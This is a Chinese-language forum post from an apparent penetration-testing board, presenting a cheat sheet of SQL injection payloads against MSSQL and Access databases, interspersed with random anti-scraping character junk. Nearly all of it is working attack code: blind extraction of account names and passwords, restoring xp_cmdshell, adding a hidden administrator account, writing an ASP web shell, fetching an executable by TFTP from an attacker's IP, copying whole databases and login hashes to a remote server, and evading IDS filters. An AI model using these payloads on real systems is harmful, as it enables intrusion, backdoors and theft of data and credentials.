中国网络渗透测试联盟

标题: SQL注入语句2 [打印本页]
作者: admin    时间: 2012-9-15 14:32
标题: SQL注入语句2
1..判断有无注入点 " n: R! z$ [, |8 j. L2 A
; and 1=1 and 1=2
; o2 s# M* G+ g
! c7 a8 w- K8 n$ X: ]
; j9 C* Z; D4 c5 h( h" S2.猜表一般的表的名称无非是admin adminuser user pass password 等..
/ Q, W4 m2 Y% Z# \and 0<>(select count(*) from *) ( b+ e# H, g& d. N' J
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
; b/ L6 L8 R) @  u) U! [+ K8 V: U, m
% ?6 Q( A: f; O: N& j1 H- i9 V, s2 c- a1 s" @; W% Y/ o" u# U
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
4 d. C  \: m3 band 0<(select count(*) from admin)
% T) _# P- R% x' Jand 1<(select count(*) from admin) - L: r) Q4 g- q
猜列名还有 and (select count(列名) from 表名)>01 Y: \" d& I( U: d1 ]
  Y# J/ I8 m. J: {1 _

7 b- M6 e7 X3 B  a2 _4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
1 Y; D! p/ r! c% e6 ?7 M8 ]and 1=(select count(*) from admin where len(*)>0)--
1 A  v/ M' J! B+ o8 f2 Jand 1=(select count(*) from admin where len(用户字段名称name)>0)
8 W( }" Y, u: t1 P% I( yand 1=(select count(*) from admin where len(密码字段名称password)>0)   G/ X- ~# B  [, X, J7 y; V

% \5 q( X* f5 l# ]; O5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 9 z: e9 o) U$ t# ?  x' V5 N
and 1=(select count(*) from admin where len(*)>0)
: P; T) G! R9 O7 z. f- Y, Qand 1=(select count(*) from admin where len(name)>6) 错误
" |( ~5 L2 d$ }( [; [, gand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 7 o5 J/ K' l' l9 s( y# x* u/ Q; Y
and 1=(select count(*) from admin where len(name)=6) 正确
+ b* b6 ~# Z+ E% F- F- W2 y
8 L% x8 u5 d+ P8 Vand 1=(select count(*) from admin where len(password)>11) 正确 $ y4 U5 g+ S; s. _; L
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 3 S! k9 D/ L- h; e
and 1=(select count(*) from admin where len(password)=12) 正确 1 k4 j; _! {/ u7 z
猜长度还有 and (select top 1 len(username) from admin)>5
- V! _/ I- l* S) \- @4 d+ V6 ?5 S& A: `- U
! X: Z" Q! Q( c$ S) `6 [2 V# |
6.猜解字符
) g8 p# n& N3 Xand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
3 _: [  S" G4 {1 w" G9 P# A3 Yand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
$ u# C& w. ~( f  D, G/ x) @就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
- `! d9 V! _: I) d& ?  ]1 b' z: M3 ^6 M) K. S1 @. S
猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
1 M3 @* I* ~% G/ v7 y- x  O$ cand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
  [8 \; F. c& f' }7 ^& W+ A% f这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
! q5 k; V& V% v$ ]# i8 ]" d. d( t: ]1 K4 G( C) ]0 k/ N( B& }
group by users.id having 1=1--
5 U& q0 M# z! i9 j) s- H2 Dgroup by users.id, users.username, users.password, users.privs having 1=1-- ! s6 N, t' ^8 @
; insert into users values( 666, attacker, foobar, 0xffff )--
" i" _- m- H$ j1 Y) A* V- C" w! D" V% A; D9 \6 ]$ m1 R
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
+ D9 X+ w) M( g+ ?UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
. q/ Q' u" o! @UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
9 n* S9 g+ Y- _0 w1 ^7 q) X6 NUNION SELECT TOP 1 login_name FROM logintable-
9 G" T* D0 ~9 C9 G  R) l1 ~& o  U' |UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
) ^: ?. {4 j% P% Y4 D
7 X8 U" H; ?( b7 {1 A看服务器打的补丁=出错了打了SP4补丁 * \( f* Y, I1 J, X) `' [* b
and 1=(select @@VERSION)--
1 T( [7 P8 H, Q& v% g  W' Q3 V6 \# @
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 , ^2 _/ x0 M9 X- E) _, s
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
; Y7 F7 @' [, {! ?3 S
% \7 }- r; L& q" l  B9 J判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
7 K! n" g* K' g) m5 L6 X* q! P/ Mand sa=(SELECT System_user)--
% \# K5 p. |2 P9 R! \9 {$ P) L7 |: s8 R8 Wand user_name()=dbo-- # i7 I) m" h8 d0 W* n7 z
and 0<>(select user_name()-- / u9 B$ Q3 a1 B/ P0 X9 k) E' V

9 F* A( }$ S' x: }3 A& n看xp_cmdshell是否删除 ( V% ?" o5 u# I& d; x2 G
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
/ B0 E# m! m1 W% R3 x# d9 m: @4 j: F) r0 g
xp_cmdshell被删除,恢复,支持绝对路径的恢复
2 R& y: c9 u: {;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
6 \( z4 m, Q  F$ n  h/ C;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- 8 w+ `+ U! c  P+ m0 C
9 ~8 L5 k) q9 T8 s& O
反向PING自己实验
  K% ]4 b: }9 \$ k6 \" l$ c;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 7 `" }6 f% m% {$ f1 @# P

  a: q3 b# F( {$ v/ Z- ]加帐号
+ [: r4 u6 K  y+ H* Z' n8 \3 B;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
: {0 x2 h4 C+ f0 G
! K# _+ f6 J% q1 a创建一个虚拟目录E盘:
0 c9 p: R6 T- S/ o( Z;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- 5 R: |3 N1 H3 b$ j# f

, U2 G9 e# Y. K' r+ W) Y访问属性:(配合写入一个webshell)
0 ?, z, Y. w# t) Y7 Vdeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
9 X% `1 K# [2 l+ q" }5 ~5 U' ]: F! T9 j  O; `; J

$ Q8 o% v- _( GMSSQL也可以用联合查询2 u+ R( v' B& a7 o3 @& l( k
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 7 _/ L) ^5 [  e9 {/ A- h# M
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
* C9 t/ }1 \& V, Q- c+ z0 ?0 S6 Y4 ], |' z; K) V, V4 ]* |

8 v+ |0 \& n8 [* c# Q6 F3 y爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
$ h0 M  }$ U+ z  M. O% h3 H* }, U8 G" B+ _) I
% a; Q4 }: o- d+ R3 K2 p+ S  e; F3 K

$ R& A( K6 n4 `9 n得到WEB路径
; m9 ^. l) i+ _# b9 M;create table [dbo].[swap] ([swappass][char](255));-- ; \  R/ J  G" ^: E6 S7 g* s9 y9 m
and (select top 1 swappass from swap)=1--
, G1 R% U/ R- _! O8 j;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
/ V, L$ p* z9 s" R7 y& x;use ku1;--
9 P4 n. @+ I. B;create table cmd (str image);-- 建立image类型的表cmd $ p- e0 {( \. f+ ~

1 b& u" m3 i/ g- D* u8 @- t  _存在xp_cmdshell的测试过程:
" l0 Q: W" b7 g+ @;exec master..xp_cmdshell dir + x' E& Q2 h3 Q  h: k5 J4 {
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 3 `; g# }$ q1 E8 j
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
9 K9 q$ L' b& i- g5 G4 X;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 6 |% j* ~2 ^5 ^, d6 `( H2 Z$ I$ v
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- 6 [6 \  t. |  V, r( k& g" x, @. {
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- , P. J4 T0 U7 S# w# \1 u$ }
exec master..xp_servicecontrol start, schedule 启动服务 # j; r1 M. |. L- b1 j/ |" g" j2 F
exec master..xp_servicecontrol start, server : U4 H: g0 l9 Z+ j
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add 3 l: Z3 |) T. R
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
' ~: }2 u% q" a, ~% d; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 , b& ^$ t$ e  ]! }$ I0 j& G
, \: Z1 R1 t2 t) h! k* D" Y
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
3 H6 E% s9 b& `; G;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
! ?4 ?  b2 y: m1 r6 a  K;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat 7 t* y( L2 r: d; I) F
如果被限制则可以。   H# p* d9 I8 s  Q  E& i4 Q
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
, {3 D% J( N7 Q! C% j. L5 k8 ]' Z# E, K6 x% K; m/ }( \
查询构造:
, \) t3 S* T" t2 s( O1 \+ oSELECT * FROM news WHERE id=... AND topic=... AND ..... 3 W* A- K- H9 K& C
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 4 B* @/ d6 V" g1 L% U6 b$ U
select 123;--
- l9 g: u5 ?% m;use master;--
8 C, {5 k' o/ x:a or name like fff%;-- 显示有一个叫ffff的用户哈。 * V3 L; `$ W9 F9 M6 l
and 1<>(select count(email) from [user]);-- ( f- C/ i: K8 X6 }
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
, H- }: z* h* {" m9 G) Q;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
& W; e) h! a. p% N: b;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--   t+ m6 y* C6 }; g2 e) M/ S0 {
;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- ' c0 \: ^' r' D& P
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- + f  D6 V5 U1 m, I$ e" t( ?; M
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
# ^& _; a4 E( [6 H! E- h: H上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
) f8 I% Y: A) r6 M5 \& p& ~通过查看ffff的用户资料可得第一个用表叫ad / S" T* t  b$ j6 ~
然后根据表名ad得到这个表的ID 得到第二个表的名字 + p: ~+ `$ `6 |

- V0 g: f5 u( S4 `insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
  j$ W. Y6 P! e3 v0 Ainsert into users values( 667,123,123,0xffff)-- : n! E. v; F6 B
insert into users values ( 123, admin--, password, 0xffff)--
0 {  C$ N9 {5 u;and user>0
2 Z3 R( ~0 Y6 X8 m* v* I;and (select count(*) from sysobjects)>0 $ z5 g" y- g6 k# b! ]1 I
;and (select count(*) from mysysobjects)>0 //为access数据库
! @0 B# A# d% W% L& |- a2 g& \+ z- O6 k5 O. F
枚举出数据表名 - m0 h8 n0 f# P" }" x
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
  r4 R* H! Y6 _' k9 b  K这是将第一个表名更新到aaa的字段处。 9 z! l4 d' T7 O, |
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 4 O" c  _8 [) n" ]( w& c1 @/ H
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- * Z: y' [7 N9 w3 b' ]4 r- D1 o
然后id=1552 and exists(select * from aaa where aaa>5)
/ D9 B( e. f- _# R* C* l1 T读出第二个表,一个个的读出,直到没有为止。 3 Z. x5 \: X& b- Y* t1 K
读字段是这样: 4 i* M: @0 d7 Z: }
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- : g  S' d$ d- a( }
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 ( S; G* A: t% F+ \- x8 J7 }
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- 1 d( k* P& X/ w- D: M( Q/ \5 p
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
- m% @5 v5 g. n6 h
  g; q) h0 q- Y9 j1 O9 B* g[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
2 z. e$ @1 w$ _9 S9 W1 |+ Wupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) $ e. f1 _2 _, r7 Y- b
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
% f( h$ f/ \2 E
$ D/ v* e. {# @4 S: Q) E[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] : S! Z/ d/ w. H; s- G
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
) o  d( c% L, `1 M% S
  c+ b1 g9 L* Y. z绕过IDS的检测[使用变量] + k4 I; W9 q# k3 V5 K+ y
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
; d) L9 E# \3 n3 G3 N$ ~; p( j;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ : ]6 u7 h9 N/ I% _
! y6 W& m7 a0 T" F+ {) j# c
1、 开启远程数据库 - b: h& g) s. V3 F& Y2 ~/ M
基本语法 ' F7 h5 J& f2 ?* H5 i5 p. |
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) 7 A1 z( e4 J  I) n3 u
参数: (1) OLEDB Provider name
  `. f3 g$ f/ J5 |+ ?) ^2、 其中连接字符串参数可以是任何端口用来连接,比如 ( u% B& y+ g. [7 n* Q6 ]/ v/ v
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table 5 L: L$ g! m, l! L8 d0 U2 n+ K! y8 i
3.复制目标主机的整个数据库insert所有远程表到本地表。 5 `% @) e; I4 \8 m, S
! y" Q, p" H1 \& F8 W
基本语法: ( r$ a2 C2 w9 H, D# Y
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 0 L9 ~; a0 q  b* i+ v: q
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: 9 q$ i3 {/ @. i: @4 b) o$ Y: W
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 * x7 h( e$ n5 H- p- E" d
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
& e; }& l$ L( |select * from master.dbo.sysdatabases
7 y0 L0 N" O5 ?1 B+ j1 [insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
! H9 O" j* @. Q7 d5 u3 }5 m5 n" xselect * from user_database.dbo.sysobjects % E& ~4 G. W$ J! q' A/ G" s
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) $ P' b- [( m  b/ c: w# V
select * from user_database.dbo.syscolumns 2 {8 y; ~; Y: t: B
复制数据库: 3 g2 l5 b; a( Y1 x
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 9 i" M2 m5 W4 n& y$ D. R+ k% a! t
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 3 F& T5 ~0 G' D, Q" d

1 F" w% E6 P; O8 Z: P3 ]; j复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
- I6 }/ P* }) D! v1 r) j( winsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
: G; w9 J2 m0 q- o+ z* g, D得到hash之后,就可以进行暴力破解。 1 b+ _: D8 ~* b# e# l

8 U9 {( W3 k( E. c( b遍历目录的方法: 先创建一个临时表:temp
3 v) @& m8 i+ {* H5 R! B;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5 _% g" `( S7 n2 y/ L;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
2 ]/ ?0 X# ~. S# A$ Q; k;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
2 v6 D" ]% d9 @& c& L;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中 " `" |; P  n! z6 ^3 k7 f. ?% j% c
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 * {6 D6 S0 U6 R- t- a! h) q# |
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--   L# d$ R9 A- J2 z. r
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
6 S  q+ P2 c& z- f7 Y;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
3 S+ x3 P+ }  O! S& L+ c- ?;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
- T. |  _2 x5 c7 n1 ]- }; h写入表: . e5 }1 i/ p( Z) O1 c# G6 B
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
4 k6 `" d6 B" F3 F) h  A2 @$ {语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
$ {- W; v+ M- B( X# w语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- ' O& l# k6 n/ }- k" b
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
, M: A5 k4 f, Q, e+ w; s语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
* X* Q" P$ V- w/ x语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- - Z1 ?( ^# s, P0 w& x) U* n
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- # L* k7 C% M' c, x1 N5 T' A
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
) r0 j9 V! v0 \" {语句9:and 1=(SELECT IS_MEMBER(db_owner));--
  I# u' k/ v: O  b- q, s' M
1 E/ f3 l! N% f+ O把路径写到表中去:   F  H: R3 B9 [: q9 D" N9 z  u! D
;create table dirs(paths varchar(100), id int)-- & R9 `, ?0 w! O6 b/ r! s: {
;insert dirs exec master.dbo.xp_dirtree c:\--
$ c. g" I6 T# M+ G: e% Tand 0<>(select top 1 paths from dirs)--
5 m+ ?- h5 ]: i5 d/ @and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- * I3 ?; I, p. e8 _
;create table dirs1(paths varchar(100), id int)-- 5 R- @& _% b' v2 O7 |. j3 N
;insert dirs exec master.dbo.xp_dirtree e:\web-- ( J% n, A/ m) G+ A
and 0<>(select top 1 paths from dirs1)-- 5 [( V5 [6 ?& |
, c; N9 B- z3 [  [+ J5 N
把数据库备份到网页目录:下载
8 _. ^1 ^* c/ i4 |' v" b;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
8 H6 k' H+ v* V" M$ m' z( U
" A8 s* E( B2 y, ?+ O3 h% x1 Pand 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
+ r  o2 x& z& ~4 F5 _# I9 S" aand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 5 Q, E2 W0 C  ~  j6 }, @
and 1=(select user_id from USER_LOGIN)
! v& l3 U: e* G$ T: u5 k' Yand 0=(select user from USER_LOGIN where user>1)
0 l1 ^# D* F1 j" t4 Y; P0 `- m% o6 a' i& s1 r1 s
-=- wscript.shell example -=- . _0 y; \1 C7 S, B3 x5 |5 y! P! |
declare @o int
; Z: K' Q6 R7 \5 ?7 Pexec sp_oacreate wscript.shell, @o out * r- Y1 A8 |( S& r; b
exec sp_oamethod @o, run, NULL, notepad.exe
: T2 Y$ i) W) y6 b9 o; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe-- # c! y1 E8 J8 S& L0 e0 l1 U
. Y5 ^. u; |+ x. \$ D& {5 v
declare @o int, @f int, @t int, @ret int
6 Y5 [( ?0 o$ g, b4 n0 fdeclare @line varchar(8000)
7 p3 _0 z4 X  Z! Kexec sp_oacreate scripting.filesystemobject, @o out
5 m/ h5 w6 J* _3 i: bexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 3 F, r3 q9 @- O2 x* {
exec @ret = sp_oamethod @f, readline, @line out
6 J# D6 a& f, v/ \while( @ret = 0 )
6 \: P7 M; o2 j3 m( Dbegin
3 }+ r# J8 U( ~6 ^1 G7 P- hprint @line . w! V5 k% [4 D+ ?* F. |# o3 `6 h
exec @ret = sp_oamethod @f, readline, @line out ) H, _+ K2 ], F/ f* Q( }% q! n
end   f: R$ C! U: b! p& ?
& T& S: i  C3 G# \& |3 n
declare @o int, @f int, @t int, @ret int
5 g8 d( U8 N: R) A9 E. r6 ?& Lexec sp_oacreate scripting.filesystemobject, @o out - y( ~' R8 {, F$ Y
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
* e8 i( h5 j9 H0 Lexec @ret = sp_oamethod @f, writeline, NULL, + R3 V0 ?) }; v4 z0 Z# P/ R
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
! D/ }# Y6 i7 k- v. t4 C; J
3 e# m9 Q+ [; f6 V/ Adeclare @o int, @ret int
! B2 @7 N% q- _8 J! l& [exec sp_oacreate speech.voicetext, @o out
; ?4 L* T  e0 a7 S6 u% l+ iexec sp_oamethod @o, register, NULL, foo, bar & @  V% s. s/ r6 i+ k
exec sp_oasetproperty @o, speed, 150 : s1 f4 t6 i- l2 Q1 h, k  p2 b
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 * ~# u: V4 @" T/ q
waitfor delay 00:00:05
9 K% l5 L9 b2 M( q
( h* c4 |: y# j" K: O6 x; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- 5 h% ]3 x; {6 O
; U' e& Z/ P1 V+ I; Y: A
xp_dirtree适用权限PUBLIC * ]3 T' H8 A- N: @4 i% N" T# I& W
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
  Z9 w: K* [7 Y0 h, M6 C! Jcreate table dirs(paths varchar(100), id int)
  @# z: }, a" {- m  s. R建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
9 A. ?: F$ L. G" ainsert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!7 U6 N2 I7 Z' D3 w




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2